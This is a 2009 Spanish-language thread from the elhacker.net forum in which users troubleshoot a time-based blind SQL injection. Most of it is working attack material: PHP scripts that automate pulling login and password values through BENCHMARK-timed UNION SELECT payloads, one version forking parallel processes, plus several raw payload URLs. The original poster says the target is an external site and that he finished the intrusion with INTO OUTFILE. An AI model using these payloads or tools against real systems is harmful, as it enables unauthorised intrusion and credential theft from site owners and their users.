Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: OzX en 1 Febrero 2009, 19:24 pm


Título: Problemas con Time-based Blind SQLI , Obtencion de Minusculas y Mayusculas
Publicado por: OzX en 1 Febrero 2009, 19:24 pm
Hi
 ;D


Espero que alguie me pueda dar un cable.

Mi Problema es el Sguiente


Tengo una Inyeccion Time-based Blind SQL; que me funciona de maravillas.

Citar
Dato = es lo mismo que hacer 2+and+1=0+union+select+all+1,2,3,4,5,6,7,8,9/* <= INY NORMAL.

Código
  1. http://www.site.com/bug.php?=2+UNION+SELECT+IF+(SUBSTRING(concat_ws(0x5F5F,login,password),0,1)/**/=/**/CHAR(%2297%22),BENCHMARK(1500000,MD5(CHAR(1))),NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+FROM+bd.tabla+WHERE+id=1+LIMIT+0,1/*

Cuando es Falso tiene un Retorno de 4 a 7 segundos y cuando es verdadero tiene un deface de mas de 15 seg, entre 20 a 21 segundos.

Codie una tool para este fallo, q me permite automatizar todo, lo posteo por si alguien luego nececita algun cable con esto.

php script.php 1 97 //Empieza del 2 caracter a buscar desde la letra a
Código
  2. 	function GET($url) {
  3. 		$curl = curl_init();
  4. 	 	$header[] = "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5";
  5. 		$header[] = "Cache-Control: max-age=0";
  6. 		$header[] = "Connection: keep-alive";
  7. 		$header[] = "Keep-Alive: 300";
  8. 		$header[] = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
  9. 		$header[] = "Accept-Language: en-us,en;q=0.5";
  10. 		$header[] = "Pragma: "; 
  11. 	 	curl_setopt($curl, CURLOPT_URL, $url);
  12. 		curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
  13. 		curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
  14. 		curl_setopt($curl, CURLOPT_REFERER, 'http://www.google.com');
  15. 		curl_setopt($curl, CURLOPT_ENCODING, 'gzip,deflate');
  16. 		curl_setopt($curl, CURLOPT_AUTOREFERER, true);
  17. 		curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  18. 		curl_setopt($curl, CURLOPT_TIMEOUT, 10);
  19. 		if (!$html = curl_exec($curl)) { 
  20. 		$html = file_get_contents($url);
  21. 						 }
  22. 		curl_close($curl);
  23. 	return $html; 
  24. 	}
  25.  
  26.  
  27.  
  28. $v = $argv[2]; //desde donde empieza el ansii 
  29. $limit = $argv[1]; // valor q obtener, el primero, segundo tercer caracter , 1,2,3
  30.  
  31. for($x=$v;$x<=122;$x++){
  32. 	$starttime=time();
  33. 	echo "[+] Testing :>  ".$x."   =================>     ".chr($x);
  34.  
  35. 	$source = GET("http://www.site.com/bug=2+UNION+SELECT+IF+(SUBSTRING(concat_ws(0x5F5F,login,password),".$limit.",1)/**/=/**/CHAR(%22".$x."%22),BENCHMARK(1500000,MD5(CHAR(1))),null),null,null,null,null,null,null,null,null+from+db.tabla+where+id=1+limit+0,1/*");
  36.  
  37. 	$endtime=time();
  38.  
  39. 	$difftime=$endtime - $starttime;
  40. 	echo "              DIFERENCIA  -> ".$difftime."\r\n";
  41. 	if ($difftime >15){ //Tiempo max de Respuesta TRUE
  42. 		system("clear");
  43. 		echo "              DIFERENCIA  -> ".$difftime."\r\n";
  44. 		echo " #####################ENCONTRADO [ ANSII[".$x."]    ".$limit."   ] ===> ".chr($x)."\r\n";
  45. 		exit();
  46. 	}
  47.  
  48. 				}



buenooo. ahora bien obtengo todos los datos que nececito, pero me surgio un gran drama, la pass y el user es case sentitive, por lo cual nececito ver si son mayusculas o minisculas, pero el blind me tira la misma cantidad de tiempo cuando es una A mayusculas que cuando es una a miniscula, y nose porque, 115 (s) y 83(S), son 2 numeros distintos pero de igual forma, me dice que es verdadero.

Citar
ozx@OzX:~/Escritorio$ php adminblind.php 1  115
  • Testing :>  115   =================>     s              DIFERENCIA  -> 20
              DIFERENCIA  -> 20
 #####################ENCONTRADO [ ANSII[115]    1   ] ===> s
ozx@OzX:~/Escritorio$ php adminblind.php 1 83
  • Testing :>  83   =================>     S              DIFERENCIA  -> 21
              DIFERENCIA  -> 21
 #####################ENCONTRADO [ ANSII[83]    1   ] ===> S



¿Como podria atravez de la Iny indentificar si es LOWER o UPPER ?


taba provando algunos SELECT+IF+LOWER, y UPPER, pero la iny se me va al carajo..

Alguna idea?

Saludos¡

Título: Re: Problemas con Time-based Blind SQLI , Obtencion de Minusculas y Mayusculas
Publicado por: nacho87 en 1 Febrero 2009, 19:59 pm
estas seguro de que el sistema es case sensitive? porque si te reconoce como iguales un char en mayusculas y otro en minusculas es porque al sistema le da igual una que otra.
No se si estas haciendo las pruebas en tu sistema o en alguno que conozcas y conoces el resultado que te debería dar pero sino, no puede ser que te esté dando el hash del password, que éste si sea indiferente entre minusculas y mayusculas?

Título: Re: Problemas con Time-based Blind SQLI , Obtencion de Minusculas y Mayusculas
Publicado por: OzX en 2 Febrero 2009, 05:21 am
Completamente seguro que es case.
es un site externo.

pues creo que el problema esta , en la misma inyecion, porque creo el traspaso directo con char(number), por lo cual testeare con la otra forma, ansii(substring... etc.

Si me va bien cuento q tal ¡

Título: Re: Problemas con Time-based Blind SQLI , Obtencion de Minusculas y Mayusculas
Publicado por: OzX en 5 Febrero 2009, 03:13 am
lo solucione xd¡
aunque no de la mejor forma.
tenia magic quotes off, y privilegios de Y , Into OUT FIle, y ya fue historia xD¡.
de todas formas es bastante particular el time based.

Saludos¡

Título: Re: Problemas con Time-based Blind SQLI , Obtencion de Minusculas y Mayusculas
Publicado por: berz3k en 5 Febrero 2009, 05:57 am
Código:
ansii(substring... etc.

duh ?

@OzX finalmente como quedo el codigo y el solve diferenciador Mayusculas/Minusculas, los chars especiales si te los toma en cuenta, haz hecho la prueba?

-berz3k.

Título: Re: Problemas con Time-based Blind SQLI , Obtencion de Minusculas y Mayusculas
Publicado por: OzX en 5 Febrero 2009, 17:51 pm
Cita de: berz3k en  5 Febrero 2009, 05:57 am
Código:
ansii(substring... etc.

duh ?

@OzX finalmente como quedo el codigo y el solve diferenciador Mayusculas/Minusculas, los chars especiales si te los toma en cuenta, haz hecho la prueba?

-berz3k.


jawjwajwaj XD
ascii(substring(( :D 


Código
  1. http://www.site.com/bug.php=2+UNION+SELECT+IF+(ASCII(SUBSTRING(group_concat(login,0x5F,password),0,1)=97),BENCHMARK(1500000,MD5(CHAR(1))),null),null,null,null,null,null,null,null,null+from+db.tabla+where+id=1+limit+1,1/*

:D asi me resulto, osea asi me indentificaba las mayus de las minus.
pero logre obtener lo que queria con into out file, al tener magic quotes off y permisos Adecuados


Por si alguien le Podria Interesar o ser Util en algo, dejo el code que utilize.


Código
  1. <?
  2. //Coded by OzX http://foro.undersecurity.net
  5.  
  6. function hexsql($text){return '0x'.strtoupper(bin2hex($text));}
  7. function GET($url) {
  8. 	$curl = curl_init();
  9.  	$header[] = "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5";
  10. 	$header[] = "Cache-Control: max-age=0";
  11. 	$header[] = "Connection: keep-alive";
  12. 	$header[] = "Keep-Alive: 300";
  13. 	$header[] = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
  14. 	$header[] = "Accept-Language: en-us,en;q=0.5";
  15. 	$header[] = "Pragma: "; 
  16.  	curl_setopt($curl, CURLOPT_URL, $url);
  17. 	curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
  18. 	curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
  19. 	curl_setopt($curl, CURLOPT_REFERER, 'http://www.google.com');
  20. 	curl_setopt($curl, CURLOPT_ENCODING, 'gzip,deflate');
  21. 	curl_setopt($curl, CURLOPT_AUTOREFERER, true);
  22. 	curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  23. 	curl_setopt($curl, CURLOPT_TIMEOUT, 10);
  24. 	if (!$html = curl_exec($curl)) { 
  25. 	$html = file_get_contents($url);
  26. 					 }
  27. 	curl_close($curl);
  28. return $html; 
  29. }
  30. function ordenar($file){
  31. 	$file = file($file);
  32. 	foreach ($file as $var){
  33. 	list($ansii,$valores)= explode(">",$var);
  34. 	$vars[$ansii] = $valores;
  35. 	}
  36. 	ksort($vars);
  37. 	foreach ($vars as $var){
  38. 	$data .=trim($var);
  39. 	}
  40. 	return array($data,$vars);
  41. }
  42.  
  43.  
  44. function blind_time($limit,$file,$db,$tabla,$columna){
  45. $ascii = array (44,95,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,#a-z
  46. 		47,32,0, //null, space, _, , 
  47. 	        48,49,50,51,52,53,54,55,56,57,	 #0-9
  48. 		65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,			     #A-Z
  49. 		33,35,36,37,38,45,46  
  50. 	);
  51.  
  52. 	for ($x=0;$x<=count($ascii);$x++){
  53. 		$f1=fopen($file,"a");
  54. 		$char = $ascii[$x];
  55. 		$starttime=time();
  56. 		echo "[+] ".$limit ." >>> Testing :>  ".$char."   =================>     ".chr($char)."\r\n";
  57. $source = GET("http://www.site.com/bug.php?=2+UNION+SELECT+IF+(SUBSTRING(group_concat(login,0x5F,password),".$limit.",1)/**/=/**/CHAR(%22".$char."%22),BENCHMARK(1500000,MD5(CHAR(1))),null),null,null,null,null,null,null,null,null+from+db.tabla+limit+0,1/*");
  58.  
  59. 		$endtime=time();
  60. 		$difftime=$endtime - $starttime;
  61. 		//echo "              DIFERENCIA  -> ".$difftime."\r\n";
  62. 		if ($difftime >15){
  63. 			$info = $limit . ">".chr($char)."\n";
  64. 			$string.= chr($char); //Obtenemos el Valor y lo Guardamos
  65. 			echo "[".$limit."] > ENCONTRADO :>>>>>>>>>>> ".$string."\r\n";
  66. 						fwrite($f1,$info);
  67. 						fclose($f1);
  68. 			exit();
  69. 		}
  70. 	}
  71. }
  72.  
  73.  
  74.  
  75. $limit = $argv[2];
  76. $start = $argv[1];
  77. //$db = $argv[3];
  78. //$tabla = $argv[4];
  79. //$columna = $argv[5];
  80.  
  81.  
  82.  
  83.  
  84. $file = rand().".txt"; 
  85. if (file_exists($file)) {
  86.    unlink($file);
  87. }
  88.  
  89.  
  90. $pids = array();
  91. for($i=$start;$i<=$limit;$i++)
  92. {
  93.   $pid = pcntl_fork();
  94.    if($pid == -1) { die('ERROR FORK');
  95.   } else if ($pid) {
  96.     $pids[] = $pid;
  97.   } else {
  98.     blind_time($i,$file,$db,$tabla,$columna);
  99.     exit();
  100.   }
  101. }
  102. foreach($pids as $pid) {
  103.   pcntl_waitpid($pid, $status);
  104.  
  105. }
  106.  
  107. list($data,$vars) = ordenar($file);
  108. echo "TABLA :> ".$tabla."   COLUMNA :>> ".$columna."\r\n";
  109. echo "Valor Obtenido :> ".$data."\r\n";
  110. echo "DEBUG :>\r\n";
  111. print_r($vars);
  112. unlink($file);
  113.  
  114.  
  115. ?>

los saca como el diablo, bastante rapido, para ser un time blind, porque si se hace letra a letra se demora bastante.

Saludos¡
OzX¡


Título: Re: Problemas con Time-based Blind SQLI , Obtencion de Minusculas y Mayusculas
Publicado por: berz3k en 9 Febrero 2009, 19:56 pm
Venga, lo pruebo hoy por la noche y ya te cuento OzX

-berz3k.


Título: Re: Problemas con Time-based Blind SQLI , Obtencion de Minusculas y Mayusculas
Publicado por: berz3k en 10 Febrero 2009, 21:53 pm
Me gusta tu code PHP te ha quedado muy wuapo, sin embargo estoy trasteando cada vez mas en PHP, ahora el string a testear es el siguiente (manualmente) :

Código:
http://x.x.x.x/blind.php?id=1+AND+ascii(substring((SELECT+password+FROM+users+where+id=1),7,1))=95
http://x.x.x.x/blind.php?id=1+AND+ascii(substring((SELECT+password+FROM+users+where+id=1),7,1))=96
http://x.x.x.x/blind.php?id=1+AND+ascii(substring((SELECT+password+FROM+users+where+id=1),7,1))=97

Para solo cuestiones de prueba y ver su funcionamiento en PHP a traves de tu code he intentado algunas cosas, vaya que lo tengo hecho en PERL y me funciona correctamente, pero me estoy enamorando de PHP por su facilidad de programar XD

Segun yo, y solo para pruebas podria ser:
Código:
$source = GET("http://x.x.x.x/blind.php?id=1+UNION+SELECT+IF+(SUBSTRING(group_concat(user,0x5F,password),".$limit.",1)/**/=/**/CHAR(%22".$char."%22),BENCHMARK(1500000,MD5(CHAR(1))),null)+from+users+limit+0,1/*");

o Tambien
Código:
$source = GET("http://x.x.x.x/blind.php?id=1+UNION+SELECT+IF+(SUBSTRING(group_concat(user,0x5F,password),".$limit.",1)/**/=/**/CHAR(%22".$char."%22),BENCHMARK(1500000,MD5(CHAR(1))))+from+users+limit+0,1/*");

Mmm algo anda mal, probare mas tarde, ideas OzX?

Ejempo TABLA
Código:
+++++++++++++++++++++++++++++++++++++++++
| 		users			|
+++++++++++++++++++++++++++++++++++++++++
| id 	|      name 	| password 	|
+++++++++++++++++++++++++++++++++++++++++
|  1 	| administrator | 1234%&_ 	|
|  2 	|  	| 	|
|  3 	|  	| 	|
+++++++++++++++++++++++++++++++++++++++++

Aunque podria agregar la funcion ASCII(SUBSTRING etc etc)+from+users, pero no tendria caso los arrays que declaro OzX.

-berz3k.








Título: Re: Problemas con Time-based Blind SQLI , Obtencion de Minusculas y Mayusculas
Publicado por: OzX en 10 Febrero 2009, 22:35 pm
Hi Brota :D


Codie esta tool para una inyeccion tipo
union+select+all+1,2,3,4,5,6,7,8,9.

Citar
http://www.site.com/bug.php?=2+UNION+SELECT+IF+(SUBSTRING(group_concat(login,0x5F,password),".$limit.",1)/**/=/**/CHAR(%22".$char."%22),BENCHMARK(1500000,MD5(CHAR(1))),null),null,null,null,null,null,null,null,null+from+db.tabla+limit+0,1/*"

Por eso los 9 null.

Ahora voy a montar un LocalHost , con un falla de blind con los mismos datos, y posteo el code modificado y ver en k taba fallando :D.

Saludos¡


Título: Re: Problemas con Time-based Blind SQLI , Obtencion de Minusculas y Mayusculas
Publicado por: berz3k en 11 Febrero 2009, 08:11 am
@OzX

Yep. tambien elimine los "nulls" no necesarios, algo me falta..., ando metido en muchas cosas, espero fixear parte de tu code en esta semana, seguramente me lo fixeas antes tu XD, es el mismo proposito pero sin usar el ASCII(substring etc etc) ya que tomara los arrays de tu code, que previamente haz declarado para MAYUSCULAS, MINUSCULAS, chars etc.

-berz3k.


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines